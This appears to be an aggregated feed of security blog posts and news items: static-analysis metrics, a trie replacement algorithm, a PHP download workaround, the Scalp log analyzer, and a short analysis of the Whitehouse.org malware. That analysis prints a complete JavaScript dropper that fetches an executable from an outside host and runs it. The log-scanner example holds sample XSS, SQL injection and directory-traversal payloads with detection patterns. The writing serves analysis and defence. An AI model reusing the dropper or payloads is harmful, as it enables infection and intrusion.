At first the line of code was implemented because it's an easy one to compute and it also gives an important value if we want to normalize the other metrics. We also decided to introduce the number of ``sources/sinks'' for studying input validation weaknesses later on... Anyway, after running some statistics on the output results, I was amazed to observe that the Pearson correlation coefficient between McCabe and lines of code was never less than 0.90 (which could be compared to a 90% correlation rate) (but I have to say that there are huge limitations in the parsers we are using for extracting information; for instance, the C is not pre-processed etc.). This result is only valid for C test cases; actually, the average observed correlation in Java test cases is around 0.60...
Of course further statistical analysis will be necessary to conclude anything on this subject, and if we were unlucky with the test case selection, this may have been a source of the problem, but I don't think we were. Actually, it seems quite logical to think that these metrics are related: the longer the code is, the more complex in terms of tests, loops etc. it can be; there is indeed more chance that a longer piece of code contains more cycles :) Oh well, I'll keep writing about this, especially since I expect to get results pretty soon...
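An added example of the two metrics and their correlation, not code from the post or from the SATE tooling: the post's parsers targeted C and Java, while this one uses Python's ast module on a small constructed source, so the function names, the sample source and the decision-point rule for the McCabe number are this example's assumptions.

```python
# Added example (not from the post or the SATE tooling): per-function
# "line of code" and a McCabe-style complexity, then the Pearson correlation
# between them, computed on a constructed Python source via the ast module.
import ast
import math

# Constructed sample source: three functions of growing size and complexity.
SAMPLE_SOURCE = '''
def trivial(x):
    return x + 1

def guarded(buf, n):
    if buf is None:
        return None
    if n > len(buf):
        n = len(buf)
    return buf[:n]

def parser(lines):
    out = []
    for line in lines:
        if not line:
            continue
        if line.startswith("#"):
            continue
        for tok in line.split():
            if tok.isdigit() and int(tok) > 0:
                out.append(int(tok))
            elif tok == "stop":
                return out
    while out and out[-1] == 0:
        out.pop()
    return out
'''

# Node types counted as decision points (assumption of this example).
DECISION_NODES = (ast.If, ast.For, ast.While, ast.IfExp,
                  ast.ExceptHandler, ast.comprehension)


def cyclomatic(func):
    """McCabe number approximated as 1 + number of decision points; a boolean
    operator with k operands adds k - 1 extra branches."""
    c = 1
    for node in ast.walk(func):
        if isinstance(node, DECISION_NODES):
            c += 1
        elif isinstance(node, ast.BoolOp):
            c += len(node.values) - 1
    return c


def loc(func):
    """Physical lines spanned by the function definition."""
    return func.end_lineno - func.lineno + 1


def function_metrics(source):
    """Map function name -> (loc, cyclomatic) for every top-level function."""
    tree = ast.parse(source)
    return {f.name: (loc(f), cyclomatic(f))
            for f in tree.body if isinstance(f, ast.FunctionDef)}


def pearson(xs, ys):
    """Pearson correlation coefficient of two equal-length samples."""
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    cov = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    sx = math.sqrt(sum((x - mx) ** 2 for x in xs))
    sy = math.sqrt(sum((y - my) ** 2 for y in ys))
    return cov / (sx * sy)


def loc_vs_mccabe(source):
    """Correlation between LOC and complexity across the functions of source."""
    metrics = function_metrics(source)
    locs = [m[0] for m in metrics.values()]
    mcs = [m[1] for m in metrics.values()]
    return pearson(locs, mcs)


if __name__ == "__main__":
    for name, (lines, mccabe) in function_metrics(SAMPLE_SOURCE).items():
        print(f"{name:8s} loc={lines:3d} mccabe={mccabe:3d}")
    print("pearson(loc, mccabe) =", round(loc_vs_mccabe(SAMPLE_SOURCE), 3))
```

Three functions are of course far too few to conclude anything, exactly as the post says; the point is only that the per-function extraction and the correlation are a few lines each once a parser gives you function boundaries and decision nodes.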

==> Trie based fast and massive replacement (Algorithm)

http://rgaucher.info/feed/rss2 While working on the C++ version of Scalp, I had to do massive simple transformations of a given text, i.e. replacements of words by others. Since the main way to do this (a loop which does one replacement at a time) is very inefficient, I decided to find something faster. I then came up with a tree based replacement algorithm; I believe this is kind of famous but I had never heard about such an algorithm. It basically uses a non-compact trie in order to have an efficient search of the current word. The main algorithm is very simple and similar to a state machine where the state depends on the next character in the trie. For example, if we want to replace the words "ba", "me", "mp" in a text, the trie will be the following one: The idea is then to iterate over all the characters in the text, and for each letter determine whether this is a possible word to replace or not (simply by looking whether the letter is a child of the trie root). Then, we iterate over the next letters in the text in order to see whether the sequence of letters is an actual word to replace or not (every time, the same methodology is used: look in the children of the current state of our iterator in the trie). This algorithm seems more efficient than the simple replace used in a loop since we perform a descent in a tree and therefore replace a linear search by a logarithmic one. I ran a little statistical comparison between two algorithms: mine and the simple loop one. The test bed is quite simple and uses randomly generated text which contains the words to replace with a certain density. In order to create statistics, I made all the sizes vary and I aggregated the results from the same dictionary size.
So, for a given size of dictionary (let's say, 200 words to replace), a text has been generated with a density that varies from 0.1 to 0.5 (from 10% to 50% of the words in the text will be words to replace) and finally, the size of the text varies from 25 to 200 words (and words are randomly generated with a size from 5 to 32). As I said previously, the results from a same dictionary size have been aggregated since I've seen in practice that the result mainly depends on the dictionary size (it also obviously depends on the size of the text, but as this is a constant for the 2 algorithms, I can compute the mean of the different data to extract the average gain for a particular dictionary size). Finally, here is the curve that shows the logarithmic progress of the gain compared to the classical method: The reference replace implementation which has been compared to the one I developed is the following (STL/C++ implementation):
  void str_replace(string& where, const string& what, const string& by)
  {
      for (string::size_type i = where.find(what);
           i != string::npos;
           i = where.find(what, i + by.size()))
          where.replace(i, what.size(), by);
  }
and has been used M times (M is the size of the dictionary). I also decided to release a very early version of this replace algorithm (which is not templated yet): stree.h, which uses the great STL-friendly tree structure from Kasper Peeters. As for the data, here is the code I used to generate the
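An added Python version of the trie walk described above (this is not the post's stree.h, which is C++ and not reproduced here). The function names and the longest-match rule are this example's choices; it also puts the classical loop method beside it to show the one case where the two disagree: sequential replacement lets the output of one rule be matched again by a later rule, while the single pass over the text never rescans what it has already emitted.

```python
# Added example: trie-based single-pass multi-word replacement, next to the
# classical loop of one replace per word. Names are this example's own.

def build_trie(replacements):
    """Non-compact trie: each node is a dict from character to child node;
    the key None marks a terminal node and stores the replacement text."""
    root = {}
    for word, by in replacements.items():
        node = root
        for ch in word:
            node = node.setdefault(ch, {})
        node[None] = by
    return root


def trie_replace(text, trie):
    """Single pass over the text. At each position, descend the trie as far
    as the following characters allow and replace the longest dictionary
    word that ends on a terminal node. Output is never rescanned, so one
    replacement can never feed another rule."""
    out = []
    i, n = 0, len(text)
    while i < n:
        node, j = trie, i
        match_end, match_by = None, None
        while j < n and text[j] in node:
            node = node[text[j]]
            j += 1
            if None in node:            # a dictionary word ends here
                match_end, match_by = j, node[None]
        if match_end is None:
            out.append(text[i])         # no word starts here: copy one char
            i += 1
        else:
            out.append(match_by)        # emit the replacement, skip the word
            i = match_end
    return "".join(out)


def loop_replace(text, replacements):
    """The classical reference method from the post: one str.replace per
    dictionary word, i.e. M full passes over the text for M words."""
    for word, by in replacements.items():
        text = text.replace(word, by)
    return text


if __name__ == "__main__":
    words = {"ba": "X", "me": "Y", "mp": "Z"}      # the post's example dictionary
    print(trie_replace("bamboo camp memo", build_trie(words)))     # Xmboo caZ Ymo
    # Where the two methods disagree: the loop rewrites "ab" to "bb" and then
    # the second rule rewrites that to "aa"; the trie pass gives "ba".
    swap = {"a": "b", "b": "a"}
    print(loop_replace("ab", swap), trie_replace("ab", build_trie(swap)))  # aa ba
```

The dictionary dict is also the cheapest place to spot the cost difference: loop_replace scans the whole text once per entry, trie_replace scans it once in total and, at each position, does at most one dictionary lookup per character of the longest word.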

==> A morning at work: Content-Disposition blocked!

http://rgaucher.info/feed/rss2 One morning, I woke up, and all the websites using a download system didn't work anymore. Yeah, this is what I've seen. I guess I don't need to tell you that it was such a pain and that all the downloading systems on the different websites we have were not working anymore. Such big stress thinking that everything is broken at first, then after some time, realizing that the problem is about the Content-Disposition header field being dropped. I won't thank the admin who didn't tell people about the modification... Anyway, I guess it's like that every time? The Content-Disposition HTTP header field is used to tell the browser how the data should be presented. I basically use it in order to force a download using a PHP script such as:
  <?php
  // download.php
  // some checks on the $fname variable to be sure
  // it exists and is in the allowed directories...
  header("Pragma: public");
  header("Expires: 0");
  header("Cache-Control: must-revalidate, pre-check=0");
  header("Content-Type: application/octet-stream");
  header("Content-Length: " . filesize($fname));
  header("Content-Disposition: attachment; filename=\"" . basename($fname) . "\"");
  header("Content-Description: File Transfer");
  @readfile($fname);
  exit;
  ?>
Now, if you cannot send the Content-Disposition field, then the browser will download the file under the name "download.php". A quite simple solution is to fool the browser by making the name of the reachable URI the same as the file it should download, using mod_rewrite:
  RewriteEngine On
  RewriteBase /mydir
  RewriteRule ^download/([^/]+)$ /mydir/download.php?file_redir=$1
And just a simple modification in the original script in order to detect the "file_redir" GET variable. But since we don't want to modify all the (generated or not) HTML files, we need to make the redirection automatic.
  <?php
  // download.php
  // $fname: the requested file, with the same checks as in the original script
  // (it exists and is in the allowed directories...)
  if (isset($_GET['file_redir'])) {
      // checks for good files (careful of directory traversal etc.):
      // keep only the base name and make sure the resolved path stays
      // inside the directory we serve from
      $dir  = realpath('/path/to/mydir/files');   // placeholder: the allowed directory
      $real = realpath($dir . '/' . basename($_GET['file_redir']));
      if ($real === false || strpos($real, $dir . '/') !== 0 || !is_file($real)) {
          header("HTTP/1.0 404 Not Found");
          exit;
      }
      header("Pragma: public");
      header("Expires: 0");
      header("Cache-Control: must-revalidate, pre-check=0");
      header("Content-Type: application/octet-stream");
      header("Content-Length: " . filesize($real));
      header("Content-Description: File Transfer");
      @readfile($real);
      exit;
  } else {
      // redirect to the rewritten URI whose last segment is the file name,
      // so the browser names the download after it
      header("Location: /mydir/download/" . rawurlencode(basename($fname)));
      exit;
  }
  ?>
Then you don't have to change all your pages. This is of course a (not so?) temporary solution since the server does extra work to reach the same state, the download of the file, but well, it does the job of fooling the browser...

==> Scalp: apache log based attack analyzer

http://rgaucher.info/feed/rss2 I started a project some time ago in order to parse Apache log files, to detect attacks etc. The attack recognition is based on the PHP-IDS filters. The first release version is written in Python http://code.google.com/p/apache-scalp/downloads/list but I started (well, almost finished) a faster multi-threaded C++ version in order to be able to handle bigger log files. The main project page is reachable here: http://code.google.com/p/apache-scalp
  Scalp the apache log! - http://code.google.com/p/apache-scalp
  usage:  ./scalp.py --log|-l --filters|-f --period [OPTIONS] --attack
     --log       |-l:  the apache log file './access_log' by default
     --filters   |-f:  the filter file './default_filter.xml' by default
     --exhaustive|-e:  will report all type of attacks detected and not stop
                       at the first found
     --period    |-p:  the period must be specified in the same format as in
                       the Apache logs using * as wild-card
                       ex: 04/Apr/2008:15:45;*/Mai/2008
                       if not specified at the end, the max or min are taken
     --html      |-h:  generate an HTML output
     --xml       |-x:  generate an XML output
     --text      |-t:  generate a simple text output (default)
     --except    |-c:  generate a file that contains the non examined logs due to
                       the main regular expression; ill-formed Apache log etc.
     --attack    |-a:  specify the list of attacks to look for
                       list: xss, sqli, csrf, dos, dt, spam, id, ref, lfi
                       the list of attacks should not contains spaces and be
                       comma separated ex: xss,sqli,lfi,ref
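An added example of the approach behind the two Scalp posts (this one and "Scalp 0.4" above), not Scalp's own code: parse Apache combined-log lines, keep the ones inside an optional period, URL-decode the request so an encoded vector is matched in its final form, run a few filter regexes keyed by attack class, and report the lines the main regular expression could not examine. The three filters are simplified, constructed stand-ins for the PHP-IDS rules, and the log lines, function names and the period syntax (a full log timestamp rather than Scalp's wildcard form) are this example's assumptions.

```python
# Added example (not Scalp's own code): the core of the log-scanning approach
# on a few constructed Apache combined-log lines.
import re
from datetime import datetime
from urllib.parse import unquote_plus

# Apache combined log format. Lines that do not match are reported as
# "not examined" instead of being silently dropped (Scalp's --except idea).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?$'
)

# Simplified, constructed filters keyed by attack class (the real
# default_filter.xml carries many more and much finer rules).
FILTERS = {
    "xss":  re.compile(r'<\s*script|\bon\w+\s*=|javascript:', re.I),
    "sqli": re.compile(r"""['"]\s*(or|and)\s+['"\w]+\s*=\s*['"\w]+|union\s+select""", re.I),
    "dt":   re.compile(r'(\.\./|\.\.\\){2,}'),
}

TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed log lines: one clean request, three encoded attack attempts,
# one malformed line and one double-encoded attempt on a later day.
SAMPLE_LOG = [
    '10.0.0.1 - - [04/Apr/2008:15:45:12 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.2 - - [04/Apr/2008:15:46:01 +0000] "GET /search.php?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 733 "-" "Mozilla/5.0"',
    '10.0.0.3 - - [04/Apr/2008:15:47:30 +0000] "GET /item.php?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 500 0 "-" "curl/7.18"',
    '10.0.0.4 - - [04/Apr/2008:15:48:05 +0000] "GET /view.php?f=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 210 "-" "-"',
    'garbage line that is not an apache log entry',
    '10.0.0.5 - - [05/Apr/2008:09:00:00 +0000] "GET /a.php?x=%253Cscript%253E HTTP/1.1" 200 10 "-" "-"',
]


def analyze(lines, start=None, end=None, exhaustive=False):
    """Scan log lines for attack vectors.

    start/end: optional bounds in the log's own timestamp format
    (e.g. "04/Apr/2008:23:59:59 +0000"), in the spirit of Scalp's --period.
    exhaustive: report every matching class, not only the first one.
    Returns (hits, unparsed); each hit is (line_no, [classes], decoded URI).
    """
    lo = datetime.strptime(start, TIME_FMT) if start else None
    hi = datetime.strptime(end, TIME_FMT) if end else None
    hits, unparsed = [], []
    for no, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            unparsed.append(no)
            continue
        t = datetime.strptime(m.group("time"), TIME_FMT)
        if (lo and t < lo) or (hi and t > hi):
            continue
        # Payloads usually arrive URL-encoded; decode twice so that a
        # double-encoded vector is matched in its final form too.
        decoded = unquote_plus(unquote_plus(m.group("uri")))
        classes = []
        for name, rx in FILTERS.items():
            if rx.search(decoded):
                classes.append(name)
                if not exhaustive:
                    break
        if classes:
            hits.append((no, classes, decoded))
    return hits, unparsed


if __name__ == "__main__":
    found, skipped = analyze(SAMPLE_LOG, exhaustive=True)
    for no, classes, uri in found:
        print(f"line {no}: {','.join(classes)}  {uri}")
    print("not examined:", skipped)
```

Two details carry most of the value in practice: decoding before matching (the last line is only caught because it is decoded twice), and keeping the list of unparsed lines, since a log format change or a deliberately malformed request would otherwise disappear from the report without a trace.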

==> My talk at SAW: Automated Evaluation of source code analyzer output

http://rgaucher.info/feed/rss2 It has been some time since I last posted on my blog... well, I've been busy, especially with the end of SATE, and oh well! I had vacation :) Anyway, at the next Static Analysis Workshop this Thursday, we're gonna talk about the SATE experiment and the observations/results we could get from it. I am then gonna talk about a tool I wrote in order to probe whether a reported weakness is a false positive: this is the Automated Evaluation. The main idea of the Automated Evaluation is to get some information on the source code and, under some assumptions, try to reach a conclusion on the correctness of the piece of code. Behind all the reasoning of that particular tool, my approach had to be radically different from a classical SCA, otherwise this would have been like creating a new SCA, which would have been obviously useless. The context of this automated evaluation is limited to buffer overflows and it can only work for proving false positives! So basically, I am reading the source code from the reported sink to the possible sources and grabbing the actions that possibly affect the variables which have a role in the code. These actions are like:
* Allocation of a destination buffer
* Computing the size of the source buffer(s)
* Test for NULL
* Test that involves the size of the buffers...
* ... and some others
Then, once these actions are detected, the tool increments a global score of false-positiveness for this reported weakness. We then only have to set a threshold in order to decide what correctness we want to have; this is really tied to the source code and how the program is developed. Even though this evaluation method is not perfect, it was adapted to the C test cases we had in SATE 2008 since the global code quality was good.
We can even say that the software was well written; it was then okay to make some assumptions on the code such as:
* If the size of the destination buffer is computed from the size of the source buffer, the size is good (basically: no off-by-one)
Also, the tool itself needs some information on the source code since it uses regular expressions to match the "actions"... Here we are for a quick explanation and here are the slides: SAW: Automated Evaluation of SCA output

==> ph34r the script kiddies: Whitehouse.org

http://rgaucher.info/feed/rss2 I was just reading this news (reported by Kanedaa) and decided to take a closer look at the content of this "malware" stuff to see if there were some nice techniques behind this so-called "attack". Oh man! How disappointing to see that this was done by script kiddies... the "obfuscation" consists of 3 levels of URL-encoded JavaScript... yeah... URL encoding is for sure an obfuscation very hard to prettify. And the final code was not obfuscated either... Just this:
  function myCreateOB(o, n) {
      var r = null;
      try { eval('r = o.CreateObject(n)') } catch(e) {}
      if (!r) { try { eval('r = o.CreateObject(n, "")') } catch(e) {} }
      if (!r) { try { eval('r = o.CreateObject(n, "", "")') } catch(e) {} }
      if (!r) { try { eval('r = o.GetObject("", n)') } catch(e) {} }
      if (!r) { try { eval('r = o.GetObject(n, "")') } catch(e) {} }
      if (!r) { try { eval('r = o.GetObject(n)') } catch(e) {} }
      return(r);
  }
  function Go(a) {
      var s = myCreateOB(a, "WS"+"cr"+"ip"+"t.S"+"he"+"ll");
      var o = myCreateOB(a, "AD"+"OD"+"B.St"+"re"+"am");
      var e = s.Environment("Process");
      var xml = null;
      var url = 'http://ad.ox88.info/bbs.jpg';
      var bin = e.Item("TEMP") + "svchost.exe";
      var dat;
      try { xml = new XMLHttpRequest(); }
      catch(e) {
          try { xml = new ActiveXObject("Mic"+"ros"+"of"+"t.XM"+"LHT"+"TP"); }
          catch(e) { xml = new ActiveXObject("MSX"+"ML2.Ser"+"verXM"+"LHT"+"TP"); }
      }
      if (!xml) return(0);
      xml.open("GET", url, false)
      xml.send(null);
      dat = xml.responseBody;
      o.Type = 1; o.Mode = 3; o.Open();
      o.Write(dat);
      o.SaveToFile(bin, 2);
      s.Run(bin,0);
  }
  function mywoewd() {
      var i = 0;
      var ss11='{7F5B7F'; var ss12='63-F06'; var ss13='F-4331-8A'; var ss14='26-339E0'
      var ss15='3C0AE3D}';
      var ss1=ss11+ss12+ss13+ss14+ss15
      var ss2="{BD96"+"C55"+"6-65A3-1"+"1D0-98"+"3A-00C04F"+"C29E36}";
      var ss3="{AB9"+"BCEDD-E"+"C7E-47"+"E1-93"+"22-D4"+"A210617116}";
      var ss4="{00"+"06F"+"033-000"+"0-0000-C0"+"00-00000"+"0000046}";
      var ss5="{0006"+"F03A-0000-00"+"00-C000-00"+"00000"+"00046}";
      var t = new Array(ss1,ss2,ss3,ss4,ss5,null);
      while (t[i]) {
          var a = null;
          if (t[i].substring(0,1) == '{') {
              a = document.createElement("object");
              a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
          } else {
              try { a = new ActiveXObject(t[i]); } catch(e){}
          }
          if (a) {
              try {
                  var b = myCreateOB(a, "WSc"+"rip"+"t.Sh"+"ell");
                  if (b) { Go(a); return(0); }
              } catch(e){}
          }
          i++;
      }
  }
As reported by Trend Micro, this is supposed to be a download of the trojan TROJ_DELF.GKP... that doesn't mean anything to me but anyway, my AV didn't detect it :)

==> Yet another study on code quality: A Tale of Four Kernels

http://rgaucher.info/feed/rss2 If like me you are interested in code quality and the general conclusions one can draw from code quality studies, I really recommend reading this paper: A Tale of Four Kernels by Diomidis Spinellis, ICSE '08: Proceedings of the 30th International Conference on Software Engineering. I just want to quote a part of the author's conclusion: "Therefore, the most we can read from the overall balance of marks is that open source development approaches do not produce software of markedly higher quality than proprietary software development." The only problem with this statement is that it is based on the fact that the metrics he used were not weighted by their importance for "Code Quality" (if this means something). Therefore, the comparison between the Windows Research Kernel and Linux seems a little bit awkward to me. Anyway, this is a very interesting paper about code quality, with lots of interesting ideas from the author of CScout.

==> Static Analysis Tool Exposition is over

http://rgaucher.info/feed/rss2 Yeah, that's sad and also a relief: SATE is over. We actually released today the last stage of the evaluation (basically, the evaluation with some corrections based on comments from the participants). Even though I would have preferred to have more feedback from participants on our evaluation, especially to increase its quality, I still think SATE is a good thing and will be an interesting resource for lots of researchers. This is, as far as I know, the only exhaustive resource on the subject (wild source code + weaknesses). What do I want to do, see next? Since we have accumulated lots of data with the tool reports (raw weaknesses) and the evaluations (I really want to thank MITRE's guys, especially Steve Christey and Bob Schmeichel, for their help), I'm looking forward to doing data analysis and trying to extract some limited results from it. Anyway, this was overall a good experience; I actually did my first real code review, mostly on lighttpd, DSpace, MvnForum and naim. I think I know way more about how to detect vulnerabilities; I have also been asking myself how to rate vulnerabilities such as Cross-Site Scripting (hopefully, I will release the little document I wrote about it); I learned so much about how people are writing code, trying to understand the design, the code etc. in the applications. Also, hopefully, I will be able to release the website I developed to handle the weaknesses from different tools. It is, I think, interesting if you are working with more than one assessor. You can send evaluations, comments, merge the weaknesses etc. with a web interface. Even though it needs improvements (it has been done in less than 2 weeks) I think this would be an interesting piece of software for people who are dealing with tons of weaknesses. Another interesting point is that we (at NIST) may open that website to everybody in order to make new evaluations and increase the quality of the data we currently have.
Oh well, it seems like a journey is really close to its end; it was such a good time sometimes, and at other times such consuming work. We've been dealing with fifty thousand weaknesses, a dozen tool reports, and almost ten test cases... I will keep you posted about the next decisions we are gonna make with SATE and hope that lots of people will find in this "exposition" the most they could get.

==> Oh please stop it with these ridiculous CAPTCHAs!

http://rgaucher.info/feed/rss2 Marcin just told me about that stupid CAPTCHA from the RapidShare website. Even if I think this is made explicitly to annoy people (this CAPTCHA is used only for free accounts), this is just stupid. Can you really tell which letters have a cat or not? I'm sorry but I can't!

==> Accelerate the convergence to the bug: Running the test in 16-bit

http://rgaucher.info/feed/rss2 Yesterday, I came across a case in a piece of software which was really hard for me to understand perfectly. Not only is the code well written (which is always worse for finding bugs :)) but the structure is also well thought out (this is the implementation of an associative array in C in the lighttpd application). The problem I had was to state whether a tool report was a true positive or a false positive. So, as in many cases I've seen in this software, a problem may occur only in the limit cases. This one may occur after INT_MAX insertions in the structure. I don't know if any of you ever tried to do such a thing, but INT_MAX (~2 billion on a typical PC) allocations alone is a lot, so inserting elements in a structure that needs at least 5 (re)allocations is too much. But well, I did it. Also, I ran this test with valgrind using the memory leak check (full check and high definition). I then ran a simple test program to fill this structure in a real condition: a typical x86/32-bit architecture. As I knew it was stupid and didn't even think this could end before 2 days, I started looking in another direction in order to reduce the INT_MAX size and have a reasonable execution time for the test. My first attempt was to shift all the types that are used; I knew this was not perfect because even if I can force my program to use unsigned short instead of size_t, I wouldn't change the size of the pointers, a char * would still be 32-bit (there may be some options in gcc to control the size of the pointers, which I doubt, but I didn't find any). Using this methodology, I was able to make the program crash in the way that would have been a real true positive.
But as I knew it was not good since the size of the pointers is not modified, and I had the feeling that in that particular structure the case of the possible crash is handled by itself (due to pointer and type limits), I started looking in another direction: running that program in 16-bit, a pseudo-real-16-bit mode. I then started looking into emulators and how to compile code for 16 bits and run it on my Linux (x86/32-bit). After having issues compiling and running the test program with the gnu-m68hc11 ELF package, I found the bcc/elksemu stuff. After compiling and running with the ELKS utilities, the test program didn't crash, it only failed in an assertion test after an allocation... Different behavior with different methods, okay... which is the correct one? Is it a problem of pointer size that made the test run differently than the real program on 32-bit, or maybe a limitation of the elksemu machine? This morning I checked the state of the 32-bit run I launched yesterday, and it was finished... ended by a failed assertion. As expected, pointer size matters when you wanna test the intrinsic limitations of a structure and its behavior using limit cases.

==> Scaling MySQL db

http://rgaucher.info/feed/rss2 I've just come across this interesting blog entry; some numbers on how people (large website companies) are actually using MySQL. http://venublog.com/2008/04/16/notes-from-scaling-mysql-up-or-out/

==> Cybergang plans to use Trojan against U.S. banks

http://rss.techtarget.com/981.xml A cybergang in Eastern Europe revealed plans to attack U.S. banks with a Gozi-like Trojan, according to RSA.

==> Improved Shylock Trojan targets banking users

http://rss.techtarget.com/981.xml The latest variant of the banking Trojan is causing numerous problems, Symantec said.

==> Tilon financial malware targets banks via MitB attack, Trusteer finds

http://rss.techtarget.com/981.xml Tilon is related to the Silon malware detected in 2009. It uses a man-in-the-browser attack to capture form submissions and steal credentials.

==> Citadel malware toolkit going underground, says RSA

http://rss.techtarget.com/981.xml The Citadel crimeware, a toolkit giving cybercriminals sophisticated financial malware, is being taken off the market by its authors, according to experts monitoring its activity.

==> Tinba banking Trojan sniffs network traffic, steals data

http://rss.techtarget.com/981.xml Tinba is among the smallest data-stealing banking Trojans discovered in the wild, according to Danish security firm CSIS Security Group.

==> Ramnit worm variant now dangerous banking malware

http://rss.techtarget.com/981.xml The Ramnit worm now supports man-in-the-middle attacks, giving cybercriminals the ability to drain a victim's bank account.

==> SIEM vendors make the case for extending SIEM product capabilities

http://rss.techtarget.com/981.xml Advanced features can reduce the threat of wire fraud. New rule sets can be shared among banks and credit unions.

==> Video: Importing Custom Settings Into Group Policy Production using Security Compliance Manager (SCM)

http://rss.windowsecurity.com/ This video explains the process of importing custom settings into Group Policy Production using Security Compliance Manager.

==> Using Virtual Smart Cards with Windows 8

http://rss.windowsecurity.com/ In this article, we'll look at how virtual smart cards are created and used in Windows 8.

==> Checkpoint VPN-1 Power - Voted WindowSecurity.com Readers' Choice Award Winner - VPN Software

http://rss.windowsecurity.com/ Checkpoint VPN-1 Power was selected the winner in the VPN Software category of the WindowSecurity.com Readers' Choice Awards. Celestix MSA Threat Management Gateway Series and Securepoint Security UTM Software were runner-up and second runner-up respectively.

==> Firewall is Enabled and Configured on Windows Server 2008/R2 Domain Controllers

http://rss.windowsecurity.com/ In this article the author reviews Windows Server 2008/R2 Firewall settings and options on Domain Controllers.

==> Video: Importing GPOs into Security Compliance Manager (SCM)

http://rss.windowsecurity.com/ This video explains the process of importing GPOs into Security Compliance Manager 2.5.

==> Tenable Nessus - Voted WindowSecurity.com Readers' Choice Award Winner - Security Scanner Software

http://rss.windowsecurity.com/ Tenable Nessus was selected the winner in the Security Scanner Software category of the WindowSecurity.com Readers' Choice Awards. Acunetix Web Vulnerability Scanner and ManageEngine Security Manager Plus were runner-up and second runner-up respectively.

==> Ghostshell takes credit for extensive hack of government, private websites

http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 11 http://www.csoonline.com/article/723577/ghostshell-takes-credit-for-extensive-hack-of-government-private-websites By Antone Gonsalves CSO December 11, 2012 The hacktivist group Team Ghostshell took credit Monday for the release of 1.6 million accounts and records stolen from government and private organizations covering aerospace, law enforcement, the military, the defense industry and banking. Among the organizations the group claimed to...

==> Email intruder causes N.C. hospital data breach

http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 11 http://www.clinical-innovation.com/topics/privacy-security/email-intruder-causes-nc-hospital-data-breach By Beth Walsh Clinical-Innovation.com Dec 11, 2012 Approximately 5,600 patients of Carolinas Medical Center-Randolph are impacted by a data breach caused by an unauthorized electronic intruder who obtained incoming and outgoing emails from a provider's account without the provider's or the hospital's knowledge. The...

==> New Cyberespionage Attack Targets Russia

http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 11 http://www.darkreading.com/advanced-threats/167901091/security/attacks-breaches/240144243/new-cyberespionage-attack-targets-russia.html By Kelly Jackson Higgins Dark Reading Dec 11, 2012 China is often considered synonymous with cyberespionage, but what about Korea? A new targeted attack campaign with apparent Korean ties has been stealing email and Facebook credentials and other user-profile information from Russian telecommunications, IT,...

==> How much crime really occurs? Don't ask the feds.

http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 11 http://www.nextgov.com/big-data/2012/12/how-much-crime-really-occurs-dont-ask-feds/60084/ By Aliya Sternstein Nextgov December 11, 2012 The United States has no accounting of how much crime there really is nationwide because FBI statistics do not reflect cybercrimes and other offenses that have cropped up since reporting began in 1930. But that might change in 2013. Millions victimized by fraud and online crimes, but this is often not...

==> Anon on the run: How Commander X jumped bail and fled to Canada

http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 11 http://arstechnica.com/tech-policy/2012/12/anon-on-the-run-how-commander-x-jumped-bai/ By Nate Anderson Ars Technica Dec 11 2012 "You scared?" asks the fugitive in the camouflage pants as he sidles up to our pre-arranged meeting point in a small Canadian park. He wears sunglasses to hide his eyes and a broad-brimmed hat to hide his face. He scans the park perimeter for police. "Cuz I'm scared enough for both of us."...

==> BlackBerry’s blacklist: 106 passwords you can't use

http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 10 http://gcn.com/blogs/cybereye/2012/12/blackberry-blacklist-106-passwords-you-cant-use.aspx By William Jackson Cybereye GCN.com Dec 07, 2012 Research In Motion's long-awaited new mobile OS, the BlackBerry 10, contains a blacklist of 106 verboten passwords that users will not be able to use to secure access to their devices, researchers have found. The new OS is expected to be released Jan. 30 and is part of a major effort by RIM to regain...

==> Anonymous member claims massive ADFA hack

http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 10 http://www.abc.net.au/news/2012-12-11/adfa-hack/4421690 ABC.net.au December 11, 2012 The private details of thousands of staff and students at the Australian Defence Force Academy (ADFA) have been hacked and released online. The details include the name, rank, birth dates and passwords of up to 20,000 people. A member of the infamous Anonymous group, known as Darwinaire, is claiming responsibility for the theft. An online blog for hackers...

==> Tor network used to command Skynet botnet

http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 10 http://news.techworld.com/security/3415592/tor-network-used-command-skynet-botnet/ By Lucian Constantin Techworld.com 10 December 2012 Security researchers have identified a botnet controlled by its creators over the Tor anonymity network. It's likely that other botnet operators will adopt this approach, according to the team from vulnerability assessment and penetration testing firm Rapid7. The botnet is called Skynet and can be used...

==> 25-GPU cluster cracks every standard Windows password in <6 hours

http://seclists.org/rss/isn.rss Posted by InfoSec News on Dec 10 http://arstechnica.com/security/2012/12/25-gpu-cluster-cracks-every-standard-windows-password-in-6-hours/ By Dan Goodin Ars Technica Dec 9 2012 A password-cracking expert has unveiled a computer cluster that can cycle through as many as 350 billion guesses per second. It's an almost unprecedented speed that can try every possible Windows passcode in the typical enterprise in less than six hours. The five-server system uses a relatively...

==> Pakistan Cyber Army declares war on Chinese, Bangladeshi sites

